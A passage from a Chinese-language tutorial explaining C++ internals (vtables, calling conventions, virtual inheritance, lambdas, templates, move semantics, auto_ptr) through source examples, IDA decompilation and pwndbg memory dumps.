Base *a = new B();
a->foo(); // B::foo() is called
((A *)a)->foo(); // B::foo() is called
return 0;
}
  • 当使用类的指针调用成员函数时:
    • 普通函数由指针类型决定
    • 虚函数由指针指向的实际类型决定
1
2
3
4
5
6
7
8
9
10
11
int __cdecl main(int argc, const char **argv, const char **envp)
{
B *v3; // rbx

v3 = (B *)operator new(8uLL);
v3->_vptr_Base = 0LL;
B::B(v3);
(*v3->_vptr_Base)(v3, argv);
(*v3->_vptr_Base)(v3);
return 0;
}
  • 这个 _vptr_Base 就是虚指针基址,它将会在对应的构造函数中进行初始化
1
2
3
4
5
void __cdecl B::B(B *const this)
{
Base::Base(this);
this->_vptr_Base = (int (**)(...))&off_3D40;
}
1
2
.data.rel.ro:0000000000003D40 8C 12 00 00 00 00 00 00       off_3D40 dq offset _ZN1B3fooEv          ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003D40 ; B::foo(void)

对于拥有虚函数的类,其每个对象均具有一个指向本类虚函数表的指针 _vptr_Base(可以将其理解为虚函数的函数指针)

案例二:虚函数的调用与虚表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
virtual void foo4(){
cout<<"Base::foo4() is called"<<endl;
}
virtual void foo5(){
cout<<"Base::foo5() is called"<<endl;
}
};

int main(void){
Base *a = new Base();
a->foo1();
a->foo2();
a->foo3();
a->foo4();
a->foo5();
}
  • cpp 底层处理虚表的方式就是强转并调用 _vptr_Base + offset
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
int __cdecl main(int argc, const char **argv, const char **envp)
{
Base *v3; // rbx
Base *a; // [rsp+8h] [rbp-18h]

v3 = (Base *)operator new(8uLL);
v3->_vptr_Base = 0LL;
Base::Base(v3);
a = v3;
(*v3->_vptr_Base)(v3, argv);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 2))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(Base *))a->_vptr_Base + 4))(a);
return 0;
}
  • 再看一个去符号的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
__int64 __fastcall main(int a1, char **a2, char **a3)
{
_QWORD *v3; // rbx
_QWORD *v5; // [rsp+8h] [rbp-18h]

v3 = (_QWORD *)operator new(8uLL);
*v3 = 0LL;
sub_13B4(v3, a2);
v5 = v3;
(*(void (__fastcall **)(_QWORD *))*v3)(v3);
(*(void (__fastcall **)(_QWORD *))(*v5 + 8LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 16LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 24LL))(v5);
(*(void (__fastcall **)(_QWORD *))(*v5 + 32LL))(v5);
return 0LL;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
5
6
.data.rel.ro:0000000000003D50 9C 12 00 00 00 00 00 00       off_3D50 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D50 ; Base::foo1(void)
.data.rel.ro:0000000000003D58 D4 12 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D60 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D68 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo4Ev ; Base::foo4(void)
.data.rel.ro:0000000000003D70 7C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo5Ev ; Base::foo5(void)
  • 用 GDB 进行调试:
1
2
3
4
5
6
pwndbg> telescope 0x55883ca88000+0x3D50
00:0000│ rdx 0x55883ca8bd50 —▸ 0x55883ca8929c (Base::foo1()) ◂— push rbp
01:00080x55883ca8bd58 —▸ 0x55883ca892d4 (Base::foo2()) ◂— push rbp
02:00100x55883ca8bd60 —▸ 0x55883ca8930c (Base::foo3()) ◂— push rbp
03:00180x55883ca8bd68 —▸ 0x55883ca89344 (Base::foo4()) ◂— push rbp
04:00200x55883ca8bd70 —▸ 0x55883ca8937c (Base::foo5()) ◂— push rbp

案例三:虚函数的继承

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include<iostream>
using namespace std;

class Base{
public:
virtual void foo1(){
cout<<"Base::foo1() is called"<<endl;
}
virtual void foo2(){
cout<<"Base::foo2() is called"<<endl;
}
virtual void foo3(){
cout<<"Base::foo3() is called"<<endl;
}
};

class A : public Base{
public:
virtual void fooa(){
cout<<"Base::fooa() is called"<<endl;
}
virtual void foob(){
cout<<"Base::fooa() is called"<<endl;
}
};

class B : public Base{
public:
virtual void fooa(){
cout<<"Base::fooa() is called"<<endl;
}
virtual void foob(){
cout<<"Base::fooa() is called"<<endl;
}
};

int main(void){
A *a = new A();
B *b = new B();
a->foo1();
a->foo2();
b->fooa();
b->foob();
a->fooa();
a->foob();
}
  • 当一个类继承带有虚函数的类时,它会先将父类的虚表复制一份,然后将自己的虚表添加到后面:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl main(int argc, const char **argv, const char **envp)
{
A *v3; // rbx
B *v4; // rbx
A *a; // [rsp+0h] [rbp-20h]
B *b; // [rsp+8h] [rbp-18h]

v3 = (A *)operator new(8uLL);
v3->_vptr_Base = 0LL;
A::A(v3);
a = v3;
v4 = (B *)operator new(8uLL);
v4->_vptr_Base = 0LL;
B::B(v4);
b = v4;
(*a->_vptr_Base)(a, argv);
(*((void (__fastcall **)(A *))a->_vptr_Base + 1))(a);
(*((void (__fastcall **)(B *))b->_vptr_Base + 3))(b);
(*((void (__fastcall **)(B *))b->_vptr_Base + 4))(b);
(*((void (__fastcall **)(A *))a->_vptr_Base + 3))(a);
(*((void (__fastcall **)(A *))a->_vptr_Base + 4))(a);
return 0;
}
  • 查看虚表,里面装有各个虚函数的首地址:
1
2
3
4
.data.rel.ro:0000000000003D30 D4 12 00 00 00 00 00 00       off_3D30 dq offset _ZN4Base4foo1Ev      ; DATA XREF: Base::Base(void)+8↑o
.data.rel.ro:0000000000003D30 ; Base::foo1(void)
.data.rel.ro:0000000000003D38 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D40 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CF8 D4 12 00 00 00 00 00 00       off_3CF8 dq offset _ZN4Base4foo1Ev      ; DATA XREF: A::A(void)+18↑o
.data.rel.ro:0000000000003CF8 ; Base::foo1(void)
.data.rel.ro:0000000000003D00 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D08 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D10 7C 13 00 00 00 00 00 00 dq offset _ZN1A4fooaEv ; A::fooa(void)
.data.rel.ro:0000000000003D18 B4 13 00 00 00 00 00 00 dq offset _ZN1A4foobEv ; A::foob(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CC0 D4 12 00 00 00 00 00 00       off_3CC0 dq offset _ZN4Base4foo1Ev      ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003CC0 ; Base::foo1(void)
.data.rel.ro:0000000000003CC8 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003CD0 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003CD8 EC 13 00 00 00 00 00 00 dq offset _ZN1B4fooaEv ; B::fooa(void)
.data.rel.ro:0000000000003CE0 24 14 00 00 00 00 00 00 dq offset _ZN1B4foobEv ; B::foob(void)

调用约定

C/C++ 函数调用约定,主要是对以下两个方面进行了约定:

  • 当参数个数多于一个时,按照什么顺序把参数压入堆栈(参数的入栈顺序)
  • 函数调用后,由谁来把堆栈恢复原状

常见的调用方式有:

  • C 语言:__cdecl __stdcall __fastcall naked __pascal
  • C++ 语言:__cdecl __stdcall __fastcall naked __pascal __thiscall

下面就分别介绍这几种调用方式:

__stdcall:StandardCall 的缩写,是C++的标准调用方式

  • 使用 PASCAL 宏,WINAPI 宏和 CALLBACK 宏来指定函数的调用方式为 stdcall
1
int _stdcall function(int a, int b); // 明确指定用stdcall
  • 参数从右向左依次压入堆栈
  • 由被调用函数自己来恢复堆栈,称为自动清栈
  • 函数名自动加前导下划线,后面紧跟着一个@,其后紧跟着参数的大小

__cdecl:C Declaration 的缩写,cdecl 调用方式又称为C调用方式,是32位C程序默认的调用方式

1
2
int function(int a, int b) // 不加修饰符就是cdecl
int _cdecl function(int a, int b) // 明确指定用cdecl
  • 参数从右向左依次压入堆栈
  • 由调用者恢复堆栈,称为手动清栈
  • 函数名自动加前导下划线

__fastcall:一种快速调用方式(通过 CPU 寄存器来传递参数),是64位C程序默认的调用方式

1
int fastcall function(int a, int b); // 明确指定用fastcall
  • 前6个参数分别放入 RDI,RSI,RDX,RCX,R8,R9
  • 其余参数从右向左依次压入堆栈
  • 如果需要用栈传参,则使用手动清栈

__thiscall:唯一一个不能明确指明的函数修饰,因为 thiscall 不是关键字,是C++类成员函数默认的调用约定

  • 由于成员函数调用还有一个 this 指针,因此必须特殊处理
  • this 指针将作为第一个参数传入,其余参数处理和 __cdecl/__thiscall 一样(取决于程序是32位还是64位)

__stdcall__cdecl 的不同之处:

  • stdcall 方式是在函数返回时利用 retn x 指令清除栈中的参数
  • cdecl 方式是函数返回后,由调用函数者修改 esp 的值来清除栈中的参数

多重继承

一个派生类如果只继承一个基类,称作单继承,那么如果继承了多个基类,就称作多继承

1
class C:public A,public B{};

1685892862095

  • 优点:派生类通过多重继承,可以得到多个基类的数据和方法,更大程度的实现了代码复用
  • 缺点:可能会导致某个类被重复构造,可能得到重复的基类数据

案例:多重继承导致重复基类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
1
2
3
4
5
A()
B()
A()
C()
D()
  • A被构造了两次

虚继承

在继承方式前面加上 virtual 关键字就是虚继承

1
class B:virtual public A{};
  • 如果虚继承类拥有派生类,则构造虚基类的任务将会交给派生类完成

案例:虚继承解决重复基类的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :virtual public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public B, public C{
public:
D(int data):A(data),B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • PS:由于B虚继承A,因此派生类D需要完成虚基类A的构造
1
2
3
4
A()
B()
C()
D()

案例:虚基类的构造问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :public B{
public:
C(int data):A(data),B(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
class D :public C{
public:
D(int data):A(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

int main(){
D* a = new D(10);
return 0;
}
  • 由于B虚继承A,因此派生类CD都有可能完成虚基类A的构造
  • 通常由最后一级的派生类通常负责构造虚基类

虚基类的内存布局:

1
2
3
4
5
00:00000x55555556aea0 ◂— 0x0
01:00080x55555556aea8 ◂— 0x21 /* '!' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557cb8 ◂— 0x555555557cb8
03:00180x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:00200x55555556aec0 ◂— 0xa0000000d /* '\r' */
  • 虚继承的子类都有一个虚基类指针,其指向虚基类表(虚基类指针和虚函数的虚指针不是同一个东西)
  • 虚继承底层实现原理与编译器相关,一般通过虚基类指针和虚基类表实现
1
2
3
4
5
6
7
8
pwndbg> telescope 0x55555556aea0
00:00000x55555556aea0 ◂— 0x0
01:00080x55555556aea8 ◂— 0x31 /* '1' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557c28 ◂— 0x0
03:00180x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:00200x55555556aec0 ◂— 0xd /* '\r' */
05:00280x55555556aec8 —▸ 0x555555557c40 —▸ 0x55555555536c (A::fun()) ◂— endbr64
06:00300x55555556aed0 ◂— 0xa /* '\n' */
  • 这里的 0x555555557c40 就是A类的虚指针,而 0x555555557c28 是D类的虚基类指针

匿名函数 Lambda

lambda 函数是一种匿名函数,它表示一个接受参数并返回一个值的函数

lambda 函数的语法如下:

1
[capture](parameters) -> return_type { function_body }

测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>

typedef int (*lambda_ta)(int);
typedef int (*lambda_tb)(int,int);
typedef double (*lambda_tc)(double);

lambda_ta lambdaA = [](int a) -> int {
return a * 2;
};

lambda_tb lambdaB = [](int a,int b) -> int {
return a * b;
};

int main() {
int x0 = 5;
int x1 = lambdaA(x0);
int x2 = lambdaB(x0,x1);
double y0 = x1 + x2;
double y1 = [](double a) -> double {
return a * 2;
}(y0);

return 0;
}
  • 在底层,局部匿名函数和全局匿名函数的实现不同
1
2
3
4
x0 = 5;
x1 = lambdaA(5);
y0 = (double)(x1 + lambdaB(5, x1));
main::{lambda(double)#1}::operator()(&__closure, y0);
  • 匿名函数和普通函数本质上的区别就是:匿名函数不能通过函数名来调用
  • 调用全局匿名函数其实是调用全局变量上对应的函数指针:
1
2
3
4
5
6
7
8
.data:0000000000004010                               public lambdaA
.data:0000000000004010 ; lambda_ta lambdaA
.data:0000000000004010 1A 12 00 00 00 00 00 00 lambdaA dq offset _ZN7lambdaAMUliE_4_FUNEi
.data:0000000000004010 ; DATA XREF: main+22↑r
.data:0000000000004018 public lambdaB
.data:0000000000004018 ; lambda_tb lambdaB
.data:0000000000004018 55 12 00 00 00 00 00 00 lambdaB dq offset _ZN7lambdaBMUliiE_4_FUNEii
.data:0000000000004018 ; DATA XREF: main+33↑r
  • 而局部匿名函数本质上是对 () 的重载
  • 调用局部匿名函数其实是调用对应的重载函数:
1
2
3
4
5
6
double __cdecl main::{lambda(double)#1}::operator()(
const main::$256B327EE357AF9FCD813216707B60D5 *const __closure,
double a)
{
return a + a; /* PS:编译器对这里进行了优化 */
}

泛型编程

模板是泛型编程的基础,泛型编程即以一种独立于任何特定类型的方式编写代码

模板有两类:函数模板,类模板

函数模板

不规定某个函数的传参类型或者返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <string>

using namespace std;

template <class T>
void Swap(T &num1, T& num2){
T tmp = num1;
num1 = num2;
num2 = tmp;
}

int main() {
int a = 10, b = 20;
Swap(a,b); /* 函数模板实例化 */
cout << "a :" << a << "b :" << b << endl;

float c = 10.55f, d = 3.14f;
Swap(c, d); /* 函数模板实例化 */
cout << "c :" << c << "d :" << d << endl;
}
  • 函数模板不规定参数类型,返回值类型
  • 在编译时,编译器会根据实际传参来创建不同类型的副本,这个过程被称为函数模板实例化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
a = 10;
b = 20;
Swap<int>(&a, &b); /* 函数模板实例化(创建int类型的副本) */
v3 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_2005);
v4 = std::ostream::operator<<(v3, (unsigned int)a);
v5 = std::operator<<<std::char_traits<char>>(v4, &unk_2009);
v6 = std::ostream::operator<<(v5, (unsigned int)b);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
c = 10.55;
d = 3.1400001;
Swap<float>(&c, &d); /* 函数模板实例化(创建float类型的副本) */
v7 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_200D);
v8 = std::ostream::operator<<(v7, *(double *)_mm_cvtsi32_si128(LODWORD(c)).m128i_i64);
v9 = std::operator<<<std::char_traits<char>>(v8, &unk_2011);
v10 = std::ostream::operator<<(v9, *(double *)_mm_cvtsi32_si128(LODWORD(d)).m128i_i64);
std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);

1686123247822

下面是一个特殊的案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>
#include <cassert>
using namespace std;

int add(int a,int b){
return a+b;
}

typedef int (*lambda_t)(int,int);
lambda_t sub = [](int a,int b) -> int {
return a-b;
};

template <typename Fn>
void func(Fn const &fn){
int a = 10;
int b = 5;
cout << fn(a,b) << endl;
}

int main(){
func(add);
func([](int a,int b) -> int {
return a * b;
});
func(sub);
}
  • 函数模板和类模板都可以将 “函数指针” 当做类型
1
2
3
func<int ()(int,int)>((int (*)(int, int))add); /* 普通函数 */
func<main::{lambda(int,int)#1}>(&fn); /* 局部匿名函数 */
func<int (*)(int,int)>(&sub); /* 全局匿名函数 */

类模板

不规定该类中某个函数的传参类型或返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
#include <string>
#include <cassert>

namespace mzt {
template<class T>
class vector {
public:
vector() : _a(nullptr),_size(0),_capacity(0){}
void push_back(const T& data) {
if (_capacity == _size) {
size_t newcapacity = _capacity == 0 ? 4 : _capacity * 2;
T* tmp = new T[newcapacity];
assert(tmp);
_a = tmp;
_capacity = newcapacity;
}
_a[_size++] = data;
}
T& operator[](size_t pos) {
assert(pos < _size);
return _a[pos];
}
size_t getsize() {
return _size;
}
private:
T* _a;
size_t _size;
size_t _capacity;
};
}

using namespace std;

int main() {
mzt::vector<int> a; /* 类模板实例化 */
a.push_back(1);
a.push_back(2);
mzt::vector<double> b; /* 类模板实例化 */
b.push_back(3.0);
b.push_back(4.0);
}
  • 类模板实例化与函数模板实例化不同
  • 类模板实例化需要在类模板名字后跟 <> 指定类型(函数模板实例化也可以用 <> 指定类型,即使没有,编译器也会自动识别类型)
1
2
3
4
5
6
7
8
9
10
mzt::vector<int>::vector(&a); /* 类模板实例化 */
LODWORD(b._a) = 1;
mzt::vector<int>::push_back(&a, (const int *)&b);
LODWORD(b._a) = 2;
mzt::vector<int>::push_back(&a, (const int *)&b);
mzt::vector<double>::vector(&b); /* 类模板实例化 */
data = 3.0;
mzt::vector<double>::push_back(&b, &data);
data = 4.0;
mzt::vector<double>::push_back(&b, &data);

模板特例化

在原模板类的基础上,针对特殊类型所进行特殊化的实现方式

模板特化中分为:函数模板特化,类模板特化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
#include <cstring>

using namespace std;

bool IsEqual(int left, int right) {
return left == right;
}

template<class T>
bool IsEqual(const T& left, const T& right) {
return left == right;
}

template< >
bool IsEqual<const char *>(const char* const& left,
const char* const& right) {
return strcmp(left, right) == 0;
}

int main(){
int a = 0;
int b = 1;
const char* p1 = "hello";
const char* p2 = "hello";
bool ret;

ret = IsEqual(a, b);
ret = IsEqual<int>(a, b);
ret = IsEqual<const char*>(p1, p2);
}
1
2
3
4
5
6
7
v4 = 0;
v5 = 1;
v6 = "hello";
v7[0] = "hello";
IsEqual(0, 1); /* 调用普通函数(最优先) */
IsEqual<int>(&v4, &v5); /* 调用模板函数 */
IsEqual<char const*>(&v6, v7); /* 调用特例化的模板函数(次优先) */
  • 如果遇到相同普通函数(函数名和类型都相同),编译器则会优先调用普通函数(最优先)
  • 如果指定类型匹配,特例化的模板函数会比普通的模板函数优先调用(次优先)

类型形参 & 非类型形参

模板参数分类:类型形参、非类型形参

  • 类型形参:出现在模板参数列表中,跟在 class 或者 typename 之后的参数类型名称
  • 非类型形参:就是用一个常量作为类(函数)模板的一个参数,在类(函数)模板中可将该参数当成常量来使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <cassert>

namespace mzt {
template<class T = int, size_t N = 10> /* T为类型形参,N为非类型形参 */
class Array {
public:
T& operator[](size_t pos) { /* 重载[] */
return arr[pos];
}
private:
T arr[N];
};
}

int main(){
mzt::Array< > a; /* 不提供模板参数,使用缺省值 */
a[0]=1;
a[1]=2;
return 0;
}
1
2
*mzt::Array<int,10ul>::operator[](&a, 0LL) = 1;
*mzt::Array<int,10ul>::operator[](&a, 1uLL) = 2;

右值引用

左值 & 右值

  • 左值是可以放在赋值号左边可以被赋值的值,左值必须要在内存中有实体
    • 当左值被赋值时,左值本身保留
  • 右值当在赋值号右边取出值赋给其他变量的值,右值可以在内存也可以在CPU寄存器
    • 当右值被赋值时,右值会被释放
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <iostream>
#include <memory>
using namespace std;

int main(){
int a = 10;
int &b = a; /* 左值引用(b相当于a的别名) */
int &&c = 20; /* 右值引用(c相当于20的别名) */

cout << &a << ":" << a << endl;
cout << &b << ":" << b << endl;
cout << &c << ":" << c << endl;
}
1
2
3
0x7ffc2d216c30:10
0x7ffc2d216c30:10
0x7ffc2d216c34:20

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
v13 = 10; /* int a = 10 */
v15 = &v13; /* int &b = a */
v14 = 20; /* int &&c = 20 */
v16 = &v14;
v3 = std::ostream::operator<<(&std::cout, &v13);
v4 = std::operator<<<std::char_traits<char>>(v3, ":");
v5 = std::ostream::operator<<(v4, v13);
std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
v6 = std::ostream::operator<<(&std::cout, v15);
v7 = std::operator<<<std::char_traits<char>>(v6, ":");
v8 = std::ostream::operator<<(v7, *v15);
std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
v9 = std::ostream::operator<<(&std::cout, v16);
v10 = std::operator<<<std::char_traits<char>>(v9, ":");
v11 = std::ostream::operator<<(v10, *v16);
std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  • 在底层,右值引用相当于是赋值与左值引用的结合

std::move

std::move 唯一的功能是将一个左值强制转化为右值引用

1
2
3
4
template <class _Ty>
inline _CONST_FUN typename remove_reference<_Ty>::type&& move(_Ty&& _Arg) _NOEXCEPT {
return (static_cast<typename remove_reference<_Ty>::type&&>(_Arg));
}
  • 如果是左值,就通过 static_cast 将传进来的参数强转为右值并返回
  • 如果是右值,直接返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <iostream>
#include <utility>
#include <vector>
#include <string>
using namespace std;

int main(){
std::string s = "Hello";
std::string sleft;
std::string sright;

sleft = s; /* 左值赋值 */
std::cout << s << endl;
std::cout << sleft << endl;
sright = std::move(s); /* 右值赋值 */
std::cout << s << endl;
std::cout << sright << endl;
}
1
2
3
4
Hello
Hello

Hello
  • 左值赋值:字符串 s 仍然存在
  • 右值赋值:字符串 s 被置空

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
std::allocator<char>::allocator(&v9, argv, envp);
std::string::basic_string<std::allocator<char>>(v10, "Hello", &v9);
std::allocator<char>::~allocator(&v9);
std::string::basic_string(v11);
std::string::basic_string(v12);
std::string::operator=(v11, v10);
v3 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
v4 = std::operator<<<char>(&std::cout, v11);
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = std::move<std::string &>(v10);
std::string::operator=(v12, v5);
v6 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
v7 = std::operator<<<char>(&std::cout, v12);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
std::string::~string(v12);
std::string::~string(v11);
std::string::~string(v10)
  • std::move 在底层会直接返回参数的原始值,真正置空字符串 s 的操作是 std::string::operator=() 函数
1
2
3
4
__int64 __fastcall std::move<std::string &>(__int64 a1)
{
return a1;
}
  • 仔细分析可以发现左值赋值和右值赋值调用的 std::string::operator=() 函数不一样
1
2
.text:0000000000002509 E8 E2 FC FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_ ; std::string::operator=(std::string const&)
.text:0000000000002509
1
2
.text:0000000000002577 E8 84 FD FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_ ; std::string::operator=(std::string&&)
.text:0000000000002577

拷贝构造函数 & 移动构造函数

如果想用其它对象初始化一个同类的新对象,只能借助类中的拷贝构造函数

  • 其实现原理是为新对象复制一份和其它对象一模一样的数据
  • 当类中拥有指针类型的成员变量时,拷贝构造函数中需要以深拷贝的方式复制该指针成员

移动构造函数使用右值引用形式的参数

  • 在此构造函数中,num 指针变量采用的是浅拷贝的复制方式
  • 在函数内部置空了 d.num(为了避免 “同一块对空间被释放多次”)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
using namespace std;

class demo{
public:
demo():num(new int(1)){
cout<<"construct!"<<endl;
}
demo(const demo &d):num(new int(*d.num)){ /* 拷贝构造函数(深拷贝) */
cout<<"copy construct!"<<endl;
}
demo(demo &&d):num(d.num){ /* 移动构造函数 */
d.num = NULL;
cout<<"move construct!"<<endl;
}
~demo(){
cout<<"class destruct!"<<endl;
}
int *num;
};

demo get_demo(){
return demo();
}

int main(){
demo a = get_demo();
demo b = a;
demo c = move(a);
return 0;
}

IDA 分析:

1
2
3
4
5
6
7
get_demo((demo *)v5);
demo::demo((demo *)v6, (const demo *)v5); /* 拷贝构造 */
v3 = std::move<demo &>(v5);
demo::demo(v7, v3); /* 移动构造 */
demo::~demo((demo *)v7);
demo::~demo((demo *)v6);
demo::~demo((demo *)v5);
1
2
3
4
5
6
7
8
9
10
11
void __fastcall demo::demo(demo *this, const demo *a2)
{
_DWORD *v2; // rax
__int64 v3; // rax

v2 = (_DWORD *)operator new(4uLL);
*v2 = **(_DWORD **)a2;
*(_QWORD *)this = v2;
v3 = std::operator<<<std::char_traits<char>>(&std::cout, "copy construct!");
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
}
1
2
3
4
5
6
7
8
9
__int64 __fastcall demo::demo(_QWORD *a1, _QWORD *a2)
{
__int64 v2; // rax

*a1 = *a2;
*a2 = 0LL;
v2 = std::operator<<<std::char_traits<char>>(&std::cout, "move construct!");
return std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
}

智能指针

智能指针 (Smart Pointer) 是一种在 C++ 中用于管理动态分配的内存的类,它提供了一种灵活的方式来管理对象的生命周期,可以避免资源泄漏和内存错误

auto_ptr

当对象过期时,其析构函数将自动使用 delete 来释放内存:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <iostream>
#include <memory>
using namespace std;

class Auto {
public:
Auto() { cout << "Auto create" << endl; }
~Auto() { cout << "Auto delete" << endl; }
int key1 = 10;
int key2 = 20;
};

int main(){
auto_ptr<Auto> test(new Auto);
int key1 = (*test).key1;
int key2 = test->key2;
int key3 = key1 + key2;
cout << key3 << endl;
return 0;
}
  • 栈上的对象会在当前语句块结束时释放,堆上的对象需要使用 delete 释放
  • auto_ptr 属于栈上的对象,在它的析构函数中会尝试 delete 目标对象

IDA 分析如下:

1
2
3
4
5
6
7
8
v5 = (Auto *)operator new(8uLL);
Auto::Auto(v5); /* Auto的构造函数 */
std::auto_ptr<Auto>::auto_ptr(v8, v5); /* auto_ptr的构造函数 */
v6 = *(_DWORD *)std::auto_ptr<Auto>::operator*(v8);
v7 = v6 + *(_DWORD *)(std::auto_ptr<Auto>::operator->(v8) + 4);
v3 = std::ostream::operator<<(&std::cout, v7);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
